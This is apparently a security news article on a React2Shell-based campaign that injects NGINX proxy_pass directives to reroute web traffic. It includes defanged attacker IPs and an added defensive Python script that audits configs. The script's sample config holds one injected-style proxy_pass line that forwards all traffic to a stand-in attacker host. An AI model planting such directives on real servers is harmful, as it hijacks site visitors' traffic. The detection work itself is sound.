thehackernews.com 2/5/2026, 5:41:04 AM · via preferred

Hackers Exploit React2Shell to Hijack Web Traffic via Compromised NGINX Servers


Cybersecurity researchers at Datadog Security Labs have disclosed an active web traffic hijacking campaign targeting NGINX installations and hosting management panels such as Baota. The attackers plant malicious NGINX configuration that routes traffic through attacker-controlled backend servers. The campaign relies on a multi-stage toolkit of shell scripts, including zx[.]sh, bt[.]sh, 4zdh[.]sh, zdh[.]sh and ok[.]sh, to establish persistence and to inject configuration that redirects incoming web requests to the attackers' backends via the proxy_pass directive.
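The defensive check a practitioner wants after reading the paragraph above is an audit of every proxy_pass target in the NGINX configuration tree. The script below is an added example, not code from the article or from Datadog Security Labs. It walks a config starting at nginx.conf, follows include directives (with glob patterns), collects the names of upstream blocks, and classifies each proxy_pass target as an in-config upstream, a loopback/unix socket, an RFC 1918 address, or an external host; external targets are the ones to review. The filesystem is replaced by an in-memory dict and the config contents, paths and the 203.0.113.45 backend address are constructed for the demo; the allowlist policy (only upstreams, loopback and private ranges are benign) is this example's assumption and should be adapted to a real deployment.

```python
"""Audit NGINX configuration for proxy_pass directives that forward traffic
to hosts outside the deployment (added example, not the article's code)."""
import fnmatch
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample config tree. A dict stands in for the filesystem so the
# example runs offline; the last location block in shop.conf is the kind of
# injected proxy_pass the campaign plants (203.0.113.45 is a documentation IP).
SAMPLE_FS = {
    "/etc/nginx/nginx.conf": """
http {
    upstream app_backend { server 127.0.0.1:8080; }
    include /etc/nginx/sites-enabled/*.conf;
}
""",
    "/etc/nginx/sites-enabled/shop.conf": """
server {
    listen 80;
    location /api/ { proxy_pass http://app_backend; }
    location /static/ { proxy_pass http://10.0.3.7:9000/; }
    # injected line: all remaining traffic now bounces through an outside host
    location / { proxy_pass http://203.0.113.45:8080$request_uri; }
}
""",
}

PROXY_RE = re.compile(r"\bproxy_pass\s+(\S+?)\s*;")
UPSTREAM_RE = re.compile(r"\bupstream\s+([^\s{]+)\s*\{")
INCLUDE_RE = re.compile(r"\binclude\s+(\S+?)\s*;")

# Ranges treated as "inside the deployment" by this example's policy. We do not
# rely on ipaddress.is_private because it also covers TEST-NET blocks.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fc00::/7")]


def walk_configs(root, fs, seen=None):
    """Yield (path, comment-stripped text) for root and every file it includes."""
    seen = set() if seen is None else seen
    if root in seen or root not in fs:
        return
    seen.add(root)
    text = re.sub(r"#[^\n]*", "", fs[root])   # drop comments, keep line breaks
    yield root, text
    for pattern in INCLUDE_RE.findall(text):
        for path in sorted(p for p in fs if fnmatch.fnmatch(p, pattern)):
            yield from walk_configs(path, fs, seen)


def classify_target(target, upstreams):
    """Return 'upstream', 'local', 'private' or 'external' for a proxy_pass value."""
    target = target.split("$", 1)[0]            # strip nginx variables like $request_uri
    if "://" not in target:
        target = "http://" + target
    if target.startswith(("http://unix:", "https://unix:")):
        return "local"                          # unix domain socket on this host
    host = (urlsplit(target).hostname or "").lower()
    if host in upstreams:
        return "upstream"
    if host == "localhost":
        return "local"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "external"                       # any other DNS name: review it
    if ip.is_loopback:
        return "local"
    if any(ip in net for net in INTERNAL_NETS):
        return "private"
    return "external"


def audit(root, fs):
    """Return (file, line, target, verdict) for every proxy_pass in the tree."""
    configs = list(walk_configs(root, fs))
    upstreams = {n.lower() for _, t in configs for n in UPSTREAM_RE.findall(t)}
    findings = []
    for path, text in configs:
        for m in PROXY_RE.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append((path, line_no, m.group(1),
                             classify_target(m.group(1), upstreams)))
    return findings


def suspicious(root, fs):
    """Only the findings that forward traffic outside the deployment."""
    return [f for f in audit(root, fs) if f[3] == "external"]


if __name__ == "__main__":
    for path, line, target, verdict in audit("/etc/nginx/nginx.conf", SAMPLE_FS):
        print(f"{verdict:9} {path}:{line}  proxy_pass {target}")
```

On a live host, replace SAMPLE_FS with a dict built from the files under /etc/nginx (or the panel's own config directory) and run the audit from cron or a file-integrity hook, since the campaign re-injects the directive after cleanup. The regex parser is deliberately simple: it enumerates targets regardless of block nesting, which is what triage needs, but it is not a full nginx grammar.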

GreyNoise noted that two IP addresses, 193.142.147[.]209 and 87.121.84[.]24, account for 56% of observed exploitation attempts two months after React2Shell's public disclosure; in total, 1,083 unique source IP addresses were involved between 26 January and 2 February 2026. The activity exploits the React2Shell vulnerability (CVE-2025-55182, CVSS 10.0), and the campaign concentrates on regional TLDs such as .in, .id, .pe, .bd and .th, as well as on Chinese hosting infrastructure.

The two dominant sources deploy distinct post-exploitation payloads, including cryptomining binaries and reverse shells, according to GreyNoise. The same report describes a coordinated reconnaissance effort against Citrix ADC Gateway and NetScaler Gateway infrastructure that used tens of thousands of residential proxies alongside a Microsoft Azure IP address to locate login panels. GreyNoise characterises it as an operation with two modes: large-scale login panel discovery, and a concentrated, AWS-hosted disclosure sprint.


Article by CyberSIXT